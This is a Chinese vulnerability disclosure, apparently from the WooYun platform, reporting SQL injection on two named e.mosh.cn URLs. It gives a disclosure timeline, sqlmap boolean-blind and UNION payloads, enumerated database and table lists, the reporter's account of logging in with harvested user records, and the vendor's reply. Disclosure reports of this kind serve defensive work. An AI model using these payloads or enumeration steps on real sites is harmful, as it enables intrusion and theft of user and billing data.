2014-03-09: 细节已通知厂商并且等待厂商处理中 2014-03-10: 厂商已经确认,细节仅向厂商公开 2014-03-20: 细节向核心白帽子及相关领域专家公开 2014-03-30: 细节向普通白帽子公开 2014-04-09: 细节向实习白帽子公开 2014-04-23: 细节向公众公开
活动时旗下某网站sql注入
漏洞地址1:http://e.mosh.cn/contectus/getContent?a_id=4漏洞地址2:http://e.mosh.cn/god/getcontent?a_id=62
---Place: GETParameter: a_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: a_id=4 AND 4566=4566 Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: a_id=-3600 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,107,119,122,58),CHAR(78,86,111,105,72,119,72,102,73,120),CHAR(58,105,107,108,58)), NULL, NULL, NULL, NULL, NULL#---available databases [8]:[*] furniture_show[*] information_schema[*] mosh[*] mosh_model[*] mosh_stat[*] mosh_tuan[*] newmosh[*] test---Place: GETParameter: a_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: a_id=4 AND 4566=4566 Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: a_id=-3600 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,107,119,122,58),CHAR(78,86,111,105,72,119,72,102,73,120),CHAR(58,105,107,108,58)), NULL, NULL, NULL, NULL, NULL#---Database: furniture_show[79 tables]+---------------------------------------+| ADM_ADDRESS || ADM_CHAR_USER || ADM_CITY_ANALYSE || ADM_DEL_LOG || ADM_EMAIL || ADM_EVENT_ALL || ADM_FORUM_COUNT || ADM_FORUM_DISTINCT_COUNT || ADM_FROM_LIST || ADM_FROM_LOG || ADM_FROM_TYPE || ADM_GROUP_RECOMMAND || ADM_LOGIN_USERS || ADM_MAX_POINT || ADM_MOSH_BANNER || ADM_MOSH_NEW_USERS || ADM_SENDEMAIL || ADM_SENDPM || ADM_USERS || ADM_USER_ALL || ADM_USER_CONTENT || ADM_USER_CONTENTCOUNT || ADM_USER_NEW_RES || ADM_linkman || LOGIN_MONTH_USERS || LOGIN_WEEK_USERS || MOSH_NEW_USERS || MOSH_USERS_FROM || MOSH_WELCOME || activity || admin_event_users || admin_forum_note || admin_group || admin_group_module || admin_manager || admin_manager_city || admin_module || admin_primary_group || admin_shadow_user || admin_temp_cityuser || advertisement || advertising || auto_notice || city_thread || columns_priv || db || func || host || moderator || module || mosh_action || mosh_ad || mosh_app || mosh_banlist || mosh_captcha || mosh_case || mosh_city || mosh_city_lat || mosh_mail_queue || mosh_mcoin_tb || mosh_module || notification || permission || pic_num || porno_pattern || position_show || preorder || proc || procs_priv || register_mail || samecity_dragoman || samecity_group || samecity_person || samecity_threadgroup || search_keywords_log || seller || seller_image || show_image || shows |+---------------------------------------+Database: test[17 tables]+---------------------------------------+| columns_priv || db || func || help_category || help_keyword || help_relation || help_topic || host || proc || procs_priv || tables_priv || time_zone || time_zone_leap_second || time_zone_name || time_zone_transition || time_zone_transition_type || user |+---------------------------------------+Database: mosh_stat[3 tables]+---------------------------------------+| state_1 || table_info || url_info |+---------------------------------------+Database: mosh_tuan[23 tables]+---------------------------------------+| tuan_change_coupon || tuan_coupon || tuan_coupon_num || tuan_delivery || tuan_email || tuan_item || tuan_mail_log || tuan_order || tuan_order_delivery || tuan_order_log || tuan_order_oplog || tuan_questions || tuan_rebate || tuan_recommend_class || tuan_recommend_relation || tuan_seller_application || tuan_send_sms_log || tuan_sendmail_info || tuan_shangjia || tuan_survey_log || tuan_trade_log || tuan_user_address || tuan_users |+---------------------------------------+Database: information_schema[17 tables]+---------------------------------------+| CHARACTER_SETS || COLLATIONS || COLLATION_CHARACTER_SET_APPLICABILITY || COLUMNS || COLUMN_PRIVILEGES || KEY_COLUMN_USAGE || PROFILING || ROUTINES || SCHEMATA || SCHEMA_PRIVILEGES || STATISTICS || TABLES || TABLE_CONSTRAINTS || TABLE_PRIVILEGES || TRIGGERS || USER_PRIVILEGES || VIEWS |+---------------------------------------+
newmosh数据库里面的总用户数:
拿前面2,3条记录登录:
数据仅做证明,并未大量获取用户信息。mosh数据库里面60多万记录,可能是老库吧,相信其他数据库还有部分用户信息。mosh_tuan里面大量账单信息,不贴了。
好好修复,好好努力
危害等级:高
漏洞Rank:18
确认时间:2014-03-10 09:29
嗯 一定好好努力,好好修复 ,非常感谢 !
暂无
被乌云君走了小产商,虽然得了18rank,实际只得4rank,呜呜,桑心死了,几乎是什么都没得到
@Mr .LZH 同感,坑爹的乌云!!